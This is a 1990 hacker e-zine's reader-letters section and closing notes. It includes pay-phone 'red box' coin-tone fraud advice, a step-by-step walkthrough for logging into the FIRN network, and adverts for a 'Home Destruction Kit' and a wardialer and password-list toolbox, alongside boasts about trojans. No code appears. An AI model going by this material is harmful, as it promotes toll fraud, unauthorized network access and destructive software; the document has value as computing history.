*NOTE: All letters sent to 'Critical Mass' writers and editors are posted
here anonymously, unless you tell us otherwise. Please, ask
questions and I will try to reply or find the answer for you. The
whole basis of this text depends on YOU!



Msg # 1 Date: Fri 12-28-90, 8:35 pm
From: XXXXXXXXXXXX Read: 1 times [1 Reply]

Subject: Hacking stuff... (Hows the wife/kids)

The Beaver,

I just finished your little article called "CRITICAL MASS", and must
say, I am impressed! You apparently know your stuff! Anyway I have a few
questions concerning some of the things you talked about... (I am interested
in that kind of thing)...

Number 1:
Where did you learn about Assembly... I mean you just do not
read the stuff you talked about in PC World or other PC magazines (do
you?)... The reason I would like to know is because I am the type of person
who likes languages, practical jokes.. ETC... (BTW nice keyboard locker, and
Disk Access locker!)(My brother went nuts trying to fix the computer!)

Number 2:
Do you know anything about something called "GREEN BOXING"...
I am sure you do, since you know about BLUE BOXING... Well, I need the plans
for a "green box", and figured you might have some you could upload, and
place a password on for me... I of course would need a part list... (Reading
the plans is hard enough for me, much less telling the difference on paper
between a capacitor and a transistor...! But hey I am learning...

And lastly:
If you have no idea what I mean (if I misnamed it)... This
little mechanism is in a little box about the size of your hand... And when
the button is pushed on it, it emits a series of clicks, and beeps... When
held up to a pay-phone, these clicks, and beeps sound to it like a Quarter
dropping into it.. And these are nice for long distance calls, etc...


Well, That is it, and oh by the way.... You would be surprised at the number
of "Program Hackers" around town now-a-days......

Thanks,

XXXXXXXXXXXX



P.S. Please keep the information coming.... Oh yea before I forget I am
having trouble getting on to the FIRN system... What is my terminal
identifier?



First the first question. I learned a lot of assembly from a school
friend of mine while taking electronics and becoming a tech. He has to be the
most versatile programmer I have ever seen. He taught me all about what
registers do to what an interrupt 13 will do. There are tons of books on
assembly, but they are hard to read and very technical. I got really started
after using an assembler called "CHASM" which comes with a little tutorial on
assembly. From there I just got the books it told me about. By the way, that's
great about your brother. Also, code like I gave in the last issue isn't hard
to find. You just got to look around, if you know what I mean.

The second question. I think you really mean a "red box". This baby
simulates the tones needed to perform nickel, quarter and dime tones. I hate
to tell you this, but I only have plans for the blue, silver, white and black
box at this time. I don't know what type of computer(s) you have, but if you
have a c64 there are tons of great programs you can get. The only problem
is that none of the boxes can be used in our area code. That's not to say that
you can't use it outside our area code though. I know that 800 and 305 work,
along with 205 and others, but if I were you, I would just stay away from it
all. Since the equipment replacing and such, it has become more difficult to
box. Mostly off 800, doing that is nuts. I can probably get the tones and
make up a schematic if you still desire one.

Third, when connecting to firn, your terminal identifier should be "a".
If this doesn't work try "d". Happy hacking..........

---==<Beaver>==---




By:XXXXXXXXXXXXXXXXX


I'm having trouble navigating through FIRN. Could you or somebody give
me some help or some pointers about what I am doing wrong. Thanks



If you have never been on the FIRN system, follow the directions below:

Call 488-0650 with your modem
wait for a connect and shit chars to be received
press return
at the terminal identifier type <a>
at the login prompt enter <menu>
press return
at the first menu type <2>
press return
at the next menu type <p>
press return
wait for about 5 sec.
press return twice
at the "#" prompt enter <call 200>
press return
wait for about 5 sec.
press return twice
you should now see a "Local>" prompt
type <show users>
press return

If you don't know what to do, or how anything works, at any "Local>" prompt,
enter <help> and return. This should show some self explanatory info. If you
have any problems, myself or the beaver will help. My knowledge of netsys's
is not cavernous, but I do know something... Anyway, If you see me on, don't
hesitate to <broadcast> to my port (unless you see a "<l>" behind my name, if
that is the case, I can receive your msg's, but not send any). I should be on
the DEC Call 200 area mostly every night from 11:00pm to about 3:00am (approx).

- Shadow



_______________________________________
l l
l Final Notes l
l_____________________________________l


Well, this concludes the second issue of Critical Mass. I wish there
was more, but you know how it goes. Before we end this issue, I would like to
state several things though. If you, the reader, don't like Critical Mass
or any of the software that myself, or anybody associated with Critical Mass
puts out, please contact us and not the people we know. Don't hassle them,
hassle me. It's fun to see how stupid you guys can be. Besides, if you don't
like it, don't download it! It's as easy as that.
I have had several people tell me (not directly) that they are going
to follow up on legal actions against me because their BBS's hard disks have
crashed. Well, I invite them to for the following reasons.........

1. I have not crashed ANYONE's hard disk. If I did you would know. I'm not
afraid to say 'I did it'. Based on the last trojans I have sent out,
and yes I did in my COMMIE years, my name was beside the program all the
way.
2. Even if I did, you don't know my name, phone number, or address. Think
about it.
3. If you really thought a 22 byte long file was a 'killer game' or what not,
you shouldn't have a hard disk in the first place.
4. If I hit you, you would know, instead of a little trojan. I prefer viruses,
EVEN THOUGH I HAVE NEVER SENT ONE OUT.


Actually, I expected a lot of E-mail from people that were pissed
about the IBM Home Destruction Kit, but I was taken by the positive E-mail
I got. It really threw me off! I like it though, so please keep sending your
E-mail in about questions, comments, insults you have. It's great. I can now
be contacted at one of the following places............ Under the name 'The
Beaver'.......

Warriers Retreat
(904) 422-3606

and

The Reactor BBS
(904) 878-1736



Please E-mail me. I enjoy it. The following software can be picked
up at 'The Reactor BBS'.............

The IBM Home Destruction Kit (v1.4)
Critical Mass #1 (138k+ of hack info!)
SC/HA ToolBox Hacker! (v3.0) COMING SOON!!!!!!!!!! INCLUDES!!!!!!!!!
    WarGame Dialer
    Repeat Dialer
    Sleep Function
    Dbase Hack (490+ most popular passwords!)
    LD account finder!
    Much more

These are written by myself, other software by other members includes......

The c64-128 Home Destruction Kit! (v1.0?) COMING SOON (by The Beaver)
ToolBox Hacker 1.0 for the IBM
                           c64
                           Apple
                           Amiga (By The Shadow) COMING SOON!


Just keep an eye out for these, and other (if they agree to it)
GrindLock products!


Once again, Thanx To: All Florida area FIRN hackers, SF's and C.C.C
                      Abigail, The Shadow (very special thanks to
                      him), Eric, all korner hackers who give info,
                      Killer (keep at it), The Baron, The Nut-Kracker,
                      My Dad (yes he knows I hack), and every hacker
                      in the TLH area for just existing! And of
                      course Mark for letting me use his board to
                      post CM here in town, even though he gets
                      hassled for it. All old C.C members that still
                      hack. Pink Floyd, for the nylon. And much more!


No Thanx To, Once again: Doug, for nothing. All NFSA sysops, except for
                         a few. Tom and Bob, after I thought they were
                         ok guys (and I still do) for saying that I u/l
                         trojans when I didn't. Why guys? Tally Net
                         sysops, for killing this text. That remote off
                         Legal3. All sysops that killed this text.


Note: When I say 'no thanx to', it's not a 'hit list', but it made me kind of
mad.

